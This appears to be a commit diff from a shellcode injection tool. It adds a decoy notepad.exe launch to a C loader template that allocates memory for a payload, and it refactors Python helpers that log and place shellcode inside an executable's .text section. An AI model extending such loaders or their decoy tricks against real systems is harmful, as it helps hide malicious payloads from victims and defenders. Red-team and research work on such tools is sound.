feature: decoy in shellcode

data/source/carrier/alloc_rw_rwx/template.c

@@ -29,6 +29,9 @@ int main()
 		return 6;
 	}
 
+	// Decoy
+	WinExec("C:\\windows\\system32\\notepad.exe", 1);
+
 	// Allocate 1
     // char *dest = ...
     char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW);

helper.py

@@ -4,6 +4,7 @@ import pathlib
 import glob
 import logging
 import pickle
+import math
 
 from model.project import WebProject
 from config import config
@@ -163,3 +164,15 @@ def find_first_utf16_string_offset(data, min_len=8):
 
     return None  # No string found that meets the criteria
 
+
+def round_up_to_multiple_of_8(x):
+    return math.ceil(x / 8) * 8
+
+
+def ui_string_decode(data):
+    if len(data) > 32:
+        return "Data with len {}".format(len(data))
+    elif b"\x00\x00" in data:
+        return "(utf16) " + data.decode("utf-16le")
+    else:
+        return "(utf8) " + data.decode("utf-8")

observer.py

@@ -1,7 +1,10 @@
 from typing import List, Dict
+import logging
 
 from pe.r2helper import r2_disas
 
+logger = logging.getLogger("Observer")
+
 
 class Observer():
     """Central class to store all logs and files created during the build process"""
@@ -53,7 +56,10 @@ class Observer():
         # Our log output
         with open(f"{working_dir}log-supermega.log", "w") as f:
             for line in observer.get_logs():
-                f.write(line + "\n")
+                try:
+                    f.write(line + "\n")
+                except Exception as e:
+                    logger.warn("Error: {}".format(e))
 
         # Stdout of executed commands
         with open(f"{working_dir}log-cmdoutput.log", "w") as f:

phases/injector.py

@@ -86,6 +86,7 @@ def inject_exe(main_shc: bytes, settings: Settings, carrier: Carrier):
                 shellcode_len, CODE_INJECT_SIZE_CHECK_ADD, sect_size
             ))
         shellcode_offset = int((sect_size - shellcode_len) / 2)  # centered in the .text section
+        #shellcode_offset = round_up_to_multiple_of_8(shellcode_offset)
         shellcode_offset += sect.PointerToRawData
         shellcode_rva = superpe.pe.get_rva_from_offset(shellcode_offset)
 
@@ -206,12 +207,8 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier):
         data_rva = hole_rva[0]
         superpe.pe.set_bytes_at_rva(data_rva, var_data)
         datareuse_fixup.addr = data_rva + carrier.superpe.get_image_base()
-        if len(var_data) <= 32:  # show strings (hope they are less than that, and shellcode is larger)
-            logging.info("       Add to .rdata at 0x{:X} ({}): {}: {}".format(
-                datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, var_data.decode("utf-16le")))
-        else:
-            logging.info("       Add to .rdata at 0x{:X} ({}): {}: Data with len {}".format(
-                datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, len(var_data)))
+        logging.info("       Add to .rdata at 0x{:X} ({}): {}: {}".format(
+            datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, ui_string_decode(var_data)))
 
     # patch code section
     # replace the placeholder with a LEA instruction to the data we written above